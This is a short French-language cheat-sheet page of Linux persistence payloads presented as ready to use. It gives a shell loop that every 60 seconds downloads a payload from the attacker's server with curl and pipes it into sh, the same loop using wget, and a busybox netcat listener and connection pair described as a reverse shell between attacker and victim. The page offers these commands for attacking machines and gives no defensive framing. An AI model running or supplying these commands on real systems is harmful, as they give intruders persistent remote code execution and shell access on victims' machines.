[Persistence/Linux] Payloads

Introduction

Cette page référence quelque payloads prêt à l'emploi pour de la persistance Linux.

Payloads

curl

Le payload suivant va récupérer la charge sur le serveur web de l'attaquant toutes les 60 secondes et l'exécuter :

while true; do curl -s http://localhost|sh; sleep 60; done

L'avantage c'est que vous pouvez changer la charge côté attaquant et ne pas forcément déclencher directement un revshell.

wget

Voici la version wget du payload ci-dessus :

while true; do wget -qO - http://localhost|sh; sleep 60; done

busybox revshell

• Côté attaquant :

busybox nc -lvp 4444

• Côté victime :

busybox nc localhost 4444